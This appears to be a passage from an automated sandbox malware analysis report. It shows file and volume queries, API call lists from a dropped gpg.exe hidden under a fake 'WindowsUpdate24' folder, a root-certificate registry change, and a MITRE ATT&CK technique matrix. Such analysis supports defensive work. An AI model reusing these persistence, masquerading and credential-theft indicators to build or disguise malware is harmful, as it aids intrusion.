Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_656EE540 GetTimeZoneInformation,GetSystemTimeAsFileTime,1_2_656EE540
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_656EE540 GetTimeZoneInformation,GetSystemTimeAsFileTime,1_2_656EE540
Source: C:\Users\user\Desktop\VirtManage.exeCode function: 0_2_00403552 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403552
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\503006091D97D4F5AE39F7CBE7927D7D652D3431 BlobJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_0049C5F0 sqlite3_db_handle,sqlite3_bind_parameter_count,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_prepare_v2,sqlite3_bind_blob,sqlite3_bind_text,sqlite3_step,sqlite3_column_text,sqlite3_column_type,sqlite3_step,gcry_free,sqlite3_reset,sqlite3_errstr,strlen,sqlite3_malloc,memcpy,sqlite3_column_count,gcry_xmalloc,sqlite3_column_name,sqlite3_errmsg,strlen,sqlite3_malloc,memcpy,sqlite3_finalize,gpgrt_log_fatal,_gpgrt_log_assert,gpgrt_log_fatal,_gpgrt_log_assert,gpgrt_log_fatal,gpgrt_log_fatal,gpgrt_log_fatal,strlen,_gpg_w32_gettext,1_2_0049C5F0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_004AC8D0 _gpg_w32_bindtextdomain,_gpg_w32_textdomain,1_2_004AC8D0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_0049C5F0 sqlite3_db_handle,sqlite3_bind_parameter_count,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_prepare_v2,sqlite3_bind_blob,sqlite3_bind_text,sqlite3_step,sqlite3_column_text,sqlite3_column_type,sqlite3_step,gcry_free,sqlite3_reset,sqlite3_errstr,strlen,sqlite3_malloc,memcpy,sqlite3_column_count,gcry_xmalloc,sqlite3_column_name,sqlite3_errmsg,strlen,sqlite3_malloc,memcpy,sqlite3_finalize,gpgrt_log_fatal,_gpgrt_log_assert,gpgrt_log_fatal,_gpgrt_log_assert,gpgrt_log_fatal,gpgrt_log_fatal,gpgrt_log_fatal,strlen,_gpg_w32_gettext,3_2_0049C5F0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_004AC8D0 _gpg_w32_bindtextdomain,_gpg_w32_textdomain,3_2_004AC8D0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_665B6564 sqlite3_value_frombind,3_2_665B6564
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_665B6260 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,3_2_665B6260
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_665B82B4 sqlite3_transfer_bindings,3_2_665B82B4
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_665B8062 sqlite3_bind_zeroblob,sqlite3_mutex_leave,3_2_665B8062
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_665B80CA sqlite3_bind_zeroblob64,sqlite3_mutex_enter,sqlite3_bind_zeroblob,sqlite3_mutex_leave,3_2_665B80CA
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_665B815A sqlite3_bind_parameter_count,3_2_665B815A
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_665B81F6 sqlite3_bind_parameter_index,3_2_665B81F6
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_665B8181 sqlite3_bind_parameter_name,3_2_665B8181
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_665B7E4A sqlite3_bind_text64,3_2_665B7E4A
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_665B7E0F sqlite3_bind_text,3_2_665B7E0F
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_665B7ED1 sqlite3_bind_text16,3_2_665B7ED1
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_665B7F0C sqlite3_bind_value,sqlite3_value_type,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,sqlite3_bind_blob,sqlite3_bind_null,3_2_665B7F0C
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 3_2_665B7C2F sqlite3_bind_double,sqlite3_mutex_leave,3_2_665B7C2F

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Replication Through Removable Media		1
Native API		1
DLL Side-Loading		1
DLL Side-Loading		1
Disable or Modify Tools		OS Credential Dumping2
System Time Discovery		Remote Services1
Archive Collected Data		1
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts112
Command and Scripting Interpreter		1
DLL Search Order Hijacking		1
DLL Search Order Hijacking		21
Deobfuscate/Decode Files or Information		LSASS Memory11
Peripheral Device Discovery		Remote Desktop Protocol1
Clipboard Data		21
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Service Execution		1
Windows Service		1
Access Token Manipulation		3
Obfuscated Files or Information		Security Account Manager2
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts2
PowerShell		1
Office Application Startup		1
Windows Service		1
DLL Side-Loading		NTDS126
System Information Discovery		Distributed Component Object ModelInput Capture3
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchd1
Registry Run Keys / Startup Folder		11
Process Injection		1
DLL Search Order Hijacking		LSA Secrets211
Security Software Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
Registry Run Keys / Startup Folder		11
Masquerading		Cached Domain Credentials1
Process Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items131
Virtualization/Sandbox Evasion		DCSync131
Virtualization/Sandbox Evasion		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Access Token Manipulation		Proc Filesystem1
Application Window Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
Process Injection		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
